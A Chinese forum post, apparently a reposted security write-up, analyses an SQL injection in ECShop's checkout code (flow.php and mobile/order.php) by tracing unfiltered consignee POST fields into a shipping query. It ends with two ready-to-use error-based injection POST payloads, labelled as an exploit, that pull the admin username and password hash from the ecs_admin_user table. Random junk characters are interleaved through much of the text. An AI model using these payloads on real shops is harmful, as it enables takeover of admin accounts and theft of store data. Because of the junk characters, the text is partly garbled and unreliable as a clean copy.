ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
7 k. t4 Y- ~2 U; M/ l- ]
    漏洞关键文件：

    /includes/lib_order.php

$ z! l( U: k  o  |; M0 m    关键函数：
% x% R" m& o$ ~9 r* |6 w( e

5 D0 e# W. D( d  H( o( f8 Q, Y& Z
, J. t2 {  j  s# L01     function available_shipping_list($region_id_list)
" F8 i9 W0 S! y/ X; ?1 P8 s2 r
02 {

  p: T  N! F+ M/ m* u, r7 e03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
! o) j! m: k( j8 J- p' H
) u1 S* R! P: \4 Z% q( r( e04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

' d/ E) _2 ^8 K7 c; N05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

  |  y7 ?8 V  R! n& ~  D06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

08             'WHERE r.region_id ' . db_create_in($region_id_list) .
  k  H, C4 x" ]) M0 r+ u* q6 D$ ^
09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

3 _7 t, {! y2 ?- b) k10   

11     return $GLOBALS['db']->getAll($sql);

12 }

2 P: X' V9 i4 I( C' h; ]显然对传入的参数没有任何过滤就带入了查询语句。

0 G4 {. Q7 l8 `$ n8 |下面我们追踪这个函数在flow.php中：
+ v5 j8 y+ @) Q/ e5 q: |/ c; i 第531行：   
* v7 @* d8 i! E9 }
4 B$ z( z/ M* _  H- u! z/ y1 $shipping_list     = available_shipping_list($region);


3 |( J. o; ^/ G
& D' n5 q; N1 Q0 A4 T

9 t* S+ x# @: B! a! B$ T8 |, T再对传入变量进行追踪：
9 V& I5 O9 }$ G& [! h
第530行：   
1 ?5 h  S* a% [- \8 ]6 X) s0 A; U* z
0 u4 f; _* g, m( R# p; ?/ E8 y1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
$ n5 V  [1 k  |+ m' |! h7 P
# ~  r) }  m- O1 T6 h: ?; l



第473行：        
4 P  a& G4 |+ J; i! s
1 $consignee = get_consignee($_SESSION['user_id']);
3 ?) u- y! z  ~8 X& n
& m$ U& X) |2 d到了一个关键函数：

% w+ r- u3 D+ E$ N' ^$ p8 N0 p/includes/lib_order.php
8 i& c, [0 O$ r, d- p9 t
+ h6 j! _0 D8 O$ ~/ p

6 K8 `0 U4 h2 @9 S1 ?

; d9 ]1 d$ ^( R01 function get_consignee($user_id)
8 J* [9 B+ Y: O  ~' L
3 M# ]2 e9 {7 {$ x02 {

03     if (isset($_SESSION['flow_consignee']))
# p9 J" G9 V2 y4 b
04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */

% R/ T! _9 y* W- w4 B+ m06   

07         return $_SESSION['flow_consignee'];

08     }

# @2 [  {! ^( x/ k% A8 S09     else
/ y/ H% Y; ~1 k( \
10     {

11         /* 如果不存在，则取得用户的默认收货人信息 */
7 @8 Y1 K  `6 ~: D
12         $arr = array();

13   
: v; I6 |/ P. @, a3 M6 q/ w- o/ a
* K/ C2 {, {  O% N14         if ($user_id > 0)

15         {

16             /* 取默认地址 */

17             $sql = "SELECT ua.*".
& `# S' z8 b# Z4 s
18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
6 `0 @4 W5 B8 p' {
19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
. f& N  _% m. C8 q
20   
; J  Q. f0 N# n; S* c
% x0 a2 h: }5 y& N21             $arr = $GLOBALS['db']->getRow($sql);
+ f* J" e' r- `0 e- i
22         }

, I5 Y- G2 w7 ]2 d+ z23   
" T9 A: y4 _0 c1 l: p$ i& s
24         return $arr;
9 O( l4 A) \/ K3 k
25     }
5 q+ X! O# ]; ~
26 }
, z, n" S& N& Q$ w, O
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？


* P4 K1 Q1 I9 W6 H
  n  {8 g! `1 M5 y关键点:
3 n/ X; o% M3 K4 b
' S+ w* S: d: J" \" ~2 ?第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

这里对传入参数反转义存入$_SESSION中。



3 Z5 A5 h5 Y; y( Y然后看下：
% V3 Q0 @0 i: A$ h


0 {' Q$ O2 M% U   

01 $consignee = array(
# X! M- D# C8 t$ ~
" \. R6 S! x) N- x1 X; E02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

: {# x: i. ^% T+ U' p7 o: E2 g03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
% J" e# K/ I0 M! B
04         'country'       => empty($_POST['country'])    ? '' _POST['country'],

05         'province'      => empty($_POST['province'])   ? '' _POST['province'],
0 B& k3 e) Z9 q
06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
2 h- G+ |3 z& Y$ o+ M4 E
% M  d/ ?9 n9 k$ ^1 F' }6 ]/ L07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

08         'email'         => empty($_POST['email'])      ? '' _POST['email'],
5 ^5 \$ G5 _: J+ Z; \
09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
+ g' P8 S7 g" M/ A. p; _0 i
10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
9 c1 h$ s5 \4 y' P- n/ R; K* G
1 f/ M8 i; o( v$ O/ J) u/ U, X" @8 W9 D11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

. Z2 N+ u# D8 [7 O13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

2 G% ?! l/ c* ]7 i/ ~: ^14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
% q1 P  m, I0 h! R7 M. m' X9 Q
15     );

好了注入就这样出现了。

==================
: a# y0 S) Q$ R% t, o0 v
注入测试：
1 |4 j- n  a5 Q+ x
3 J! t2 v0 Q6 H# B% {1 H环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
( Z) t% n& {" z7 k
测试程序：ECShop_V2.7.3_UTF8_release1106

4 Z6 a' [+ R" y+ m/ q

9 k# Y9 D8 d1 j1 e/ I* \1.首先需要点击一个商品加入购物车
2 p$ |3 S5 \9 v6 a5 Y& i# i
8 D/ v3 G7 u- P0 u5 j' e3 b6 n) g+ a# T2.注册一个会员帐号

3.post提交数据

7 d! B( \$ f, ]; I6 l
$ D2 c: P. @) }  e
3 [6 o0 K& G1 I, Z  {1 http://127.0.0.1/ecshop/flow.php
+ [" c6 J4 N* x
2   
- d( |: b6 y; T) I
2 C/ D8 N! A$ J- u  P+ g3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
  x- q9 E+ d& ~4 u$ {' ~  C举一反三，我们根据这个漏洞我们可以继续深入挖掘：

8 a) b, D; E# F( ^. n我们搜寻关键函数function available_shipping_list()
+ Z  R+ W% W1 }- U( U7 s
在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

3 R0 l0 f: ?. X8 t3 i; [1.点击一个商品，点击购买商标

) q# E! |. p; q4 P* a8 t2.登录会员帐号
& f$ U- b7 j; E
) w  y' N0 j( j* U3.post提交：
( Z. Y, `" b7 D) w$ \4 T
! A5 n. G# Z4 H5 N1 k2 O' ihttp://127.0.0.1/ecshop/mobile/order.php
) z1 j" j0 @3 @, H2 M3 Y+ L- X

3 K& A7 I6 c: [) C
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

' B! u/ c" x- X. M; e# ?. q/ P